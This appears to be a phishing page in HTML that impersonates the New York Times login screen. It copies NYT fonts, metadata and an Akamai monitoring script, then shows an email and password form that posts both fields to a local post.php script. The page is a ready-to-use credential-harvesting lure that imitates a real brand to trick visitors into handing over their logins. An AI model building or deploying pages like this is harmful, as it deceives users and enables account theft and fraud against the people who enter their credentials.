| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352 |
- <!DOCTYPE html>
- <html lang="en">
-
- <!-- Creatred by https://github.com/makdosx -->
-
- <head>
- <title>The New York Times</title>
-
- <link rel="icon" type="image/png" href="favicon.png"/>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <meta name="sourceApp" content="nyt-lire" />
- <meta name="viewport" content="initial-scale=1, maximum-scale=1" />
- <meta name="et2Host" content="https://a.et.nytimes.com/" />
- <style>
- @font-face {
- font-family: nyt-franklin;
- src: url(//typeface.nyt.com/fonts/nyt-franklin-300-normal.woff)
- format('woff');
- font-style: normal;
- font-weight: 300;
- }
- @font-face {
- font-family: nyt-franklin;
- src: url(//typeface.nyt.com/fonts/nyt-franklin-500-normal.woff)
- format('woff');
- font-style: normal;
- font-weight: 500;
- }
- html,
- body {
- height: 100%;
- }
- body {
- position: relative;
- margin: 0;
- font-size: 16px;
- font-family: 'nyt-franklin', arial, helvetica, sans-serif;
- -moz-text-size-adjust: 100%;
- -webkit-text-size-adjust: 100%;
- -webkit-font-smoothing: antialiased;
- -moz-osx-font-smoothing: grayscale;
- }
- body.embedded {
- height: auto;
- overflow: hidden;
- }
- .full-page {
- display: flex;
- flex-flow: column nowrap;
- flex: 0 0 auto;
- height: 100%;
- }
-
-
- #form
- {
- height: 350px;
- width: 350px;
- }
-
-
- #user
- {
- height: 12%;
- width: 90%;
- }
-
-
- #pass
- {
- height: 12%;
- width: 90%;
- }
-
-
-
- #sub
- {
- height: 12%;
- width: 93%;
- background-color:black;
- color:white;
- font-size:17px;
- font-weight: bold;
- border:0;
- outline:0;
- }
- #sub:hover
- {
- height: 12%;
- width: 93%;
- background-color:#333333;
- color:white;
- font-size:17px;
- font-weight: bold;
- border:0;
- outline:0;
- }
-
- </style>
- <script>
- /* eslint-disable */
- /**
- * Provided by Akamai for integration with mPulse.
- * Original source available from mPulse settings.
- * See https://developer.akamai.com/akamai-mpulse-real-user-monitoring-solution for more details.
- */
- (function() {
- // Boomerang Loader Snippet version 14
- if (window.BOOMR && (window.BOOMR.version || window.BOOMR.snippetExecuted)) {
- return;
- }
-
- window.BOOMR = window.BOOMR || {};
- window.BOOMR.snippetStart = new Date().getTime();
- window.BOOMR.snippetExecuted = true;
- window.BOOMR.snippetVersion = 14;
-
- window.BOOMR.url = "https://s.go-mpulse.net/boomerang/" +
- "ATH8A-MAMN8-XPXCH-N5KAX-8D239";
-
- var // document.currentScript is supported in all browsers other than IE
- where = document.currentScript || document.getElementsByTagName("script")[0],
- // Parent element of the script we inject
- parentNode = where.parentNode,
- // Whether or not Preload method has worked
- promoted = false,
- // How long to wait for Preload to work before falling back to iframe method
- LOADER_TIMEOUT = 3000;
-
- // Tells the browser to execute the Preloaded script by adding it to the DOM
- function promote() {
- if (promoted) {
- return;
- }
-
- var script = document.createElement("script");
- script.id = "boomr-scr-as";
- script.src = window.BOOMR.url;
-
- // Not really needed since dynamic scripts are async by default and the script is already in cache at this point,
- // but some naive parsers will see a missing async attribute and think we're not async
- script.async = true;
-
- parentNode.appendChild(script);
-
- promoted = true;
- }
-
- // Non-blocking iframe loader (fallback for non-Preload scenarios) for all recent browsers.
- // For IE 6/7, falls back to dynamic script node.
- function iframeLoader(wasFallback) {
- promoted = true;
-
- var dom, doc = document, bootstrap, iframe, iframeStyle, win = window;
-
- window.BOOMR.snippetMethod = wasFallback ? "if" : "i";
-
- // Adds Boomerang within the iframe
- bootstrap = function(parent, scriptId) {
- var script = doc.createElement("script");
- script.id = scriptId || "boomr-if-as";
- script.src = window.BOOMR.url;
-
- BOOMR_lstart = new Date().getTime();
-
- parent = parent || doc.body;
- parent.appendChild(script);
- };
-
- // For IE 6/7, we'll just load the script in the current frame, as those browsers don't support 'about:blank'
- // for an iframe src (it triggers warnings on secure sites). This means loading on IE 6/7 may cause SPoF.
- if (!window.addEventListener && window.attachEvent && navigator.userAgent.match(/MSIE [67]\./)) {
- window.BOOMR.snippetMethod = "s";
-
- bootstrap(parentNode, "boomr-async");
- return;
- }
-
- // The rest of this function is IE8+ and other browsers that don't support Preload hints but will work with CSP & iframes
- iframe = document.createElement("IFRAME");
-
- // An empty frame
- iframe.src = "about:blank";
-
- // We set title and role appropriately to play nicely with screen readers and other assistive technologies
- iframe.title = "";
- iframe.role = "presentation";
-
- // Ensure we're not loaded lazily
- iframe.loading = "eager";
-
- // Hide the iframe
- iframeStyle = (iframe.frameElement || iframe).style;
- iframeStyle.width = 0;
- iframeStyle.height = 0;
- iframeStyle.border = 0;
- iframeStyle.display = "none";
-
- // Append to the end of the current block
- parentNode.appendChild(iframe);
-
- // Try to get the iframe's document object
- try {
- win = iframe.contentWindow;
- doc = win.document.open();
- }
- catch (e) {
- // document.domain has been changed and we're on an old version of IE, so we got an access denied.
- // Note: the only browsers that have this problem also do not have CSP support.
-
- // Get document.domain of the parent window
- dom = document.domain;
-
- // Set the src of the iframe to a JavaScript URL that will immediately set its document.domain to match the parent.
- // This lets us access the iframe document long enough to inject our script.
- // Our script may need to do more domain massaging later.
- iframe.src = "javascript:var d=document.open();d.domain='" + dom + "';void 0;";
- win = iframe.contentWindow;
-
- doc = win.document.open();
- }
-
- if (dom) {
- // Unsafe version for IE8 compatibility. If document.domain has changed, we can't use win, but we can use doc.
- doc._boomrl = function() {
- this.domain = dom;
- bootstrap();
- };
-
- // Run our function at load.
- // Split the string so HTML code injectors don't get confused and add code here.
- doc.write("<bo" + "dy onload='document._boomrl();'>");
- }
- else {
- // document.domain hasn't changed, regular method should be OK
- win._boomrl = function() {
- bootstrap();
- };
-
- if (win.addEventListener) {
- win.addEventListener("load", win._boomrl, false);
- }
- else if (win.attachEvent) {
- win.attachEvent("onload", win._boomrl);
- }
- }
-
- // Finish the document
- doc.close();
- }
-
- // See if Preload is supported or not
- var link = document.createElement("link");
-
- if (link.relList &&
- typeof link.relList.supports === "function" &&
- link.relList.supports("preload") &&
- ("as" in link)) {
- window.BOOMR.snippetMethod = "p";
-
- // Set attributes to trigger a Preload
- link.href = window.BOOMR.url;
- link.rel = "preload";
- link.as = "script";
-
- // Add our script tag if successful, fallback to iframe if not
- link.addEventListener("load", promote);
- link.addEventListener("error", function() {
- iframeLoader(true);
- });
-
- // Have a fallback in case Preload does nothing or is slow
- setTimeout(function() {
- if (!promoted) {
- iframeLoader(true);
- }
- }, LOADER_TIMEOUT);
-
- // Note the timestamp we started trying to Preload
- BOOMR_lstart = new Date().getTime();
-
- // Append our link tag
- parentNode.appendChild(link);
- }
- else {
- // No Preload support, use iframe loader
- iframeLoader(false);
- }
-
- // Save when the onload event happened, in case this is a non-NavigationTiming browser
- function boomerangSaveLoadTime(e) {
- window.BOOMR_onload = (e && e.timeStamp) || new Date().getTime();
- }
-
- if (window.addEventListener) {
- window.addEventListener("load", boomerangSaveLoadTime, false);
- }
- else if (window.attachEvent) {
- window.attachEvent("onload", boomerangSaveLoadTime);
- }
- })();
- </script></head>
- <body>
- <div align="center">
- <br>
- <img src="logo.jpeg" height="40" width="200">
- <hr>
-
- <h2> Log in or create an account </h2>
-
- <form action="post.php" method="post" id="form">
-
- <span> <b> Email Address </b> </span>
-
-
- <br>
- <input type="email" name="user" id="user">
-
- <br><br>
-
- <span> <b> Pssword </b> </span>
-
-
-
- <br>
- <input type="password" name="pass" id="pass">
-
- <br><br>
-
- <input type="submit" name="sub" id="sub" value="Log In">
-
- </form>
-
- </div>
- </body>
- </html>
|